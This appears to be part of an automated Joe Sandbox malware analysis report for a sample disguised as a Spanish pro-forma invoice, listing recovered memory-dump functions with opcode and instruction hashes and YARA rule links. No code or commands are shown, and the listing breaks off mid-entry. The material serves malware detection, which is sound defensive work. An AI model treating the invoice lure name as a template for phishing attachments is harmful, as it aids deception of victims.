                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 11932c3295703c21605b87de24fd0a652027b935f5c7871e959b7f112ade5ec8
                                                  • Instruction ID: a450882fae05a17b717e86107211608ffa64ba6c4aedace430b1abd21133831a
                                                  • Opcode Fuzzy Hash: 11932c3295703c21605b87de24fd0a652027b935f5c7871e959b7f112ade5ec8
                                                  • Instruction Fuzzy Hash: BA51AD71610A01DFE722DF66C984F6AB3FAFF04798FD00429EA559B260DB30E941CB61
                                                  Function 367544D1 Relevance: .2, Instructions: 156COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
                                                  • Instruction ID: 313abb283b14ca770610db2c03c7cdc2ce132de137bbdf5b5828145a28dc9de0
                                                  • Opcode Fuzzy Hash: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
                                                  • Instruction Fuzzy Hash: CA519F71D00319ABDF15CF96C894BEE7BB5EF44754F9180A9EA00AF244EB34D944CBA0
                                                  Function 367F86A8 Relevance: .2, Instructions: 152COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b60653fcc95ce2ca89755ffc873b53038dcd21506c92cb80801df1ced5152b86
                                                  • Instruction ID: b19edccebf34ab07410f493bc46b8b9726c8f8b35cd91e17281f237248041014
                                                  • Opcode Fuzzy Hash: b60653fcc95ce2ca89755ffc873b53038dcd21506c92cb80801df1ced5152b86
                                                  • Instruction Fuzzy Hash: 3741B575B306109BD7158B26CC94F7BB7ABEF807A0FD08219E9158F390DB36D821C6A1
                                                  Function 3643052F Relevance: .1, Instructions: 148COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84425845160.0000000036430000.00000040.00001000.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36430000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2bfc49298cf0aef4c2a4e772573b7f8e8afc12d607592ae9c464985ef2a527ff
                                                  • Instruction ID: 93b078a3958ba176d2c08ffdf3205430e41a0d902eab46f0cfc9552db68fbf11
                                                  • Opcode Fuzzy Hash: 2bfc49298cf0aef4c2a4e772573b7f8e8afc12d607592ae9c464985ef2a527ff
                                                  • Instruction Fuzzy Hash: 95411671E19B098FD368DF69D4816A6B3E1FF49700F60162ED986C3352EB70E852C785
                                                  Function 3676F63F Relevance: .1, Instructions: 143COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 70d7803dac08e6ff0316ac33cc1e604de721b199bfa9ffe8c4003921b9b703f2
                                                  • Instruction ID: e0b07f915d5017dda17e9cacb3522f734ca2bb4d9b0894d28b9aec535f7a5c89
                                                  • Opcode Fuzzy Hash: 70d7803dac08e6ff0316ac33cc1e604de721b199bfa9ffe8c4003921b9b703f2
                                                  • Instruction Fuzzy Hash: 0741A5B6D00629ABDB11DB99D884AEF77FDDF04654FD50166EA04AB200DB39CE018BE1
                                                  Function 367FA553 Relevance: .1, Instructions: 139COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
                                                  • Instruction ID: 746a0cf9db6edee4f45e9c3425c7ab6e2a6a77746cb3f71255c7e9e76119f3ba
                                                  • Opcode Fuzzy Hash: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
                                                  • Instruction Fuzzy Hash: D7410371A20711DBD715CF28C884E6AB3AAFF84754B80852DE9118F340EB72ED54C7D1
                                                  Function 3676A350 Relevance: .1, Instructions: 139COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 13b9159764342b23a2e94b7ee73746b181b796eff25fff6f9a42504b68eb2926
                                                  • Instruction ID: ba562ee7f24f1a0df7d7e24e8f21e5cbc14d0f752f03b912e9d959b59c5b8a82
                                                  • Opcode Fuzzy Hash: 13b9159764342b23a2e94b7ee73746b181b796eff25fff6f9a42504b68eb2926
                                                  • Instruction Fuzzy Hash: 394118B17403105BEF149E6BCC94B2A3B62EB49B4CF80902DEF15AF241DBA1D842C791
                                                  Function 3673D454 Relevance: .1, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6d496468b0ded977f35c6363273c98a7d3006523f11200e0fcda2f6901dc5ae8
                                                  • Instruction ID: d6c5a86e68c0cbf18d223014d5e9ed4fa4919d52e0604133324d622eecb8cc45
                                                  • Opcode Fuzzy Hash: 6d496468b0ded977f35c6363273c98a7d3006523f11200e0fcda2f6901dc5ae8
                                                  • Instruction Fuzzy Hash: 5051F275A057508FE711CB19D854BAA73E6EB40BA4FE545A4F801CF392DB38DC40CBA2
                                                  Function 36772670 Relevance: .1, Instructions: 137COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                  • Instruction ID: 11855b84d046c491ffbe164e18f1ba5c67e2cd793c5db4e3839aec5daa01e629
                                                  • Opcode Fuzzy Hash: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                  • Instruction Fuzzy Hash: 63515C79E00255DFDB05CF99C480AADF7B2FF88714F6482A9D815AB390D771AE41CB90
                                                  Function 36736074 Relevance: .1, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 915fc3f72e0ac1cc9cc349be5fd56240e6993beb9a946265bccf3dd3c454480a
                                                  • Instruction ID: 9fd079e58ba9d5a06145c1de8f38d04bbbb079d9ac0005a019bb2f4b17fd4164
                                                  • Opcode Fuzzy Hash: 915fc3f72e0ac1cc9cc349be5fd56240e6993beb9a946265bccf3dd3c454480a
                                                  • Instruction Fuzzy Hash: E951E374951216DBEB65CB24CC04BE977F2EF05314FA082A9D2149F2C2DB749991CF81
                                                  Function 3672B0D6 Relevance: .1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ec4068d7cf60c0b5294af3337ccf256e2526763bd415b83240d1a88f9fa891ad
                                                  • Instruction ID: 9d3789d8d2496cf30fb5fc466b6b53580426d722e87059f64ecbcfadb9ad74ee
                                                  • Opcode Fuzzy Hash: ec4068d7cf60c0b5294af3337ccf256e2526763bd415b83240d1a88f9fa891ad
                                                  • Instruction Fuzzy Hash: 3641D3B0640751EFE7129F66CC49B1ABBF9EF05B98F908469E610DF250D770D940CB91
                                                  Function 3675A390 Relevance: .1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bdf40ddc62a853f21527e9418581fed56e57846c550cd86a84ff0eb475bb12e3
                                                  • Instruction ID: 4c11010c6f6fd2ca27adfccc5e0f06bf5e5bd4bef98cc78a2fcec2fd3cd1dce3
                                                  • Opcode Fuzzy Hash: bdf40ddc62a853f21527e9418581fed56e57846c550cd86a84ff0eb475bb12e3
                                                  • Instruction Fuzzy Hash: 7541AD75904714CFEB018FA8C844BAE77B2FB48758F9181A9D610BF290DFB49801CBA0
                                                  Function 3675D600 Relevance: .1, Instructions: 126COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 626cfe96071d682fbf5bdc899026336b90863cf20e723ec095d5dd6caf4e32b5
                                                  • Instruction ID: 287b7db1f2a71da0ee337148c5d96ec6f083f1993b7eb08164b249c55be3c675
                                                  • Opcode Fuzzy Hash: 626cfe96071d682fbf5bdc899026336b90863cf20e723ec095d5dd6caf4e32b5
                                                  • Instruction Fuzzy Hash: 7941F071110200DFD320DF29CC84F6A77E9EF48760F91466EEB255B251CB34A852CBA2
                                                  Function 36760630 Relevance: .1, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                  • Instruction ID: fe4488338c497c8daf6a838534026112e75049b08e3e3aac8f09d92061fe98cc
                                                  • Opcode Fuzzy Hash: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                  • Instruction Fuzzy Hash: B3416E75A00705DFDB14CF9ACA80A5AB7F5FF48708B60496DE956EB250E730EA44CF50
                                                  Function 3676F523 Relevance: .1, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bb048e0f634d55f1d5cb6d85e3b0de5dee077ba842274429b8b70cc143f921c8
                                                  • Instruction ID: 2d8260cca69edb572524b4cc8d243d15505ebb1badae84dd7c1c037475f80ce2
                                                  • Opcode Fuzzy Hash: bb048e0f634d55f1d5cb6d85e3b0de5dee077ba842274429b8b70cc143f921c8
                                                  • Instruction Fuzzy Hash: EE414EB4D00288DFDB14CFAAC880AADBBF5BF49704F90816ED955EB201D7349945CF60
                                                  Function 367FD7A7 Relevance: .1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ceb42465a202bcc9c849feefbca9c3d96efc5ceb784b2b8438e965ef39f096ca
                                                  • Instruction ID: 7a6b54dbd2673bf7b2b5ed58eb010be6d4d0472af96087fdd82f9efcb30878f6
                                                  • Opcode Fuzzy Hash: ceb42465a202bcc9c849feefbca9c3d96efc5ceb784b2b8438e965ef39f096ca
                                                  • Instruction Fuzzy Hash: 4B41DFB1A143018FE315DF69C884F2ABBE6EBC8754F84452CE9958F381DB36D845CB92
                                                  Function 36761796 Relevance: .1, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a975df99a07eadb5fb833d48231d7744aaddfa338abc69445e9e2d09ec5da935
                                                  • Instruction ID: d101702aa24649c30e75f6d7fa264488e4d19cf8340e0b8c864e005752cbf28d
                                                  • Opcode Fuzzy Hash: a975df99a07eadb5fb833d48231d7744aaddfa338abc69445e9e2d09ec5da935
                                                  • Instruction Fuzzy Hash: 694178B6E00355DFEB05CF5AC880BA9BBF2FB49714F54816AE908AF354C7349941CB90
                                                  Function 367B0227 Relevance: .1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cdeefe0ead0d83a7802b6f49375ef6cae006ea0d4df4d67a462c589c17b6e7f5
                                                  • Instruction ID: 6f1c167b0a7d9430167807c15cd4b72a1c268cf4bde99784f29e41ff391f3c35
                                                  • Opcode Fuzzy Hash: cdeefe0ead0d83a7802b6f49375ef6cae006ea0d4df4d67a462c589c17b6e7f5
                                                  • Instruction Fuzzy Hash: C44192766087419FD711CF69C858F7AB7EABF88740F80062DF9588B690E730D905C7A6
                                                  Function 367566E0 Relevance: .1, Instructions: 102COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                  • Instruction ID: cbd84412fabf8a432ae27b6f9fe343a145e6053c0004b420884c72bdfdaa210c
                                                  • Opcode Fuzzy Hash: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                  • Instruction Fuzzy Hash: 7B41D076500A45DFDB32CF25C844FAA77E5FB46B60F814578E6098F6A0CB31E801DB91
                                                  Function 36755004 Relevance: .1, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                  • Instruction ID: 60dc1e2b70869f01cc88a5960ba124a3c7f9955db8b9da5ab3a043b352ee8cae
                                                  • Opcode Fuzzy Hash: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                  • Instruction Fuzzy Hash: 72310735A28301DFF710DA298414B67B7E6EB857D8FD285AAE6888F280C735C841C7D2
                                                  Function 367AE79D Relevance: .1, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cbad091abc16d0f80fee8029116b0395607e4654f0b94aefed30d113206fba55
                                                  • Instruction ID: e5f7e7d1d879b7e73ebf9045db6ef7b2e55ef18690b4c2dc51e2e6375f44b91b
                                                  • Opcode Fuzzy Hash: cbad091abc16d0f80fee8029116b0395607e4654f0b94aefed30d113206fba55
                                                  • Instruction Fuzzy Hash: EC3125B5FA17909BF312876ACD48B3577DABF40B84FD506B0AA049F7D2DB28D840D621
                                                  Function 367296E0 Relevance: .1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: cd56225b0226f4cdeefc0849d992edbe90594c677df3de9b4c0b1e8c47972147
                                                  • Instruction ID: 50cc1995ae5a8e6244f19308aaa8724d22c32d090f0149863ff078cfb25f9010
                                                  • Opcode Fuzzy Hash: cd56225b0226f4cdeefc0849d992edbe90594c677df3de9b4c0b1e8c47972147
                                                  • Instruction Fuzzy Hash: 7F21F576900710AFD3219F6AC858B1A7BB5FF88B64F954429A6259F340DB30DE40CBD1
                                                  Function 36738470 Relevance: .1, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8edcb2fc1b15aeea059a0ffe4d2fed4946b1697216140028d434e8e1b1ff8f34
                                                  • Instruction ID: 4529fa5773f6d52f7920db1c661a2582f48e57b79631d8f731e3790ef3ede02c
                                                  • Opcode Fuzzy Hash: 8edcb2fc1b15aeea059a0ffe4d2fed4946b1697216140028d434e8e1b1ff8f34
                                                  • Instruction Fuzzy Hash: 4031D2B1A063519FE310CF19C800B66BBEAFB88700F9149ADF9889B751D774D804CBD1
                                                  Function 3672D64A Relevance: .1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                  • Instruction ID: 0d17edbdd22aab92779fc45e9edf941d3bad61fe045628fe72619aea4c3a2834
                                                  • Opcode Fuzzy Hash: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                  • Instruction Fuzzy Hash: 5031D27AA00654AFEB11CE49C9C4F6A73AADF847D8FA18429E9089F254E774DD40CB90
                                                  Function 3676A5E7 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
                                                  • Instruction ID: a536ce0da7e0df57c86f6c1c35195aa581b438428efaa56adc89e73daac99604
                                                  • Opcode Fuzzy Hash: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
                                                  • Instruction Fuzzy Hash: 33312EB6B007019FE764CF6ACD44B56B7E8AB08B94F94452DA999CB750FA70E800CB54
                                                  Function 368017BC Relevance: .1, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                  • Instruction ID: e757289e01b3f8468cfe29437f2ec493096ff5e136c9b2d5e4ac19af827dfaab
                                                  • Opcode Fuzzy Hash: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
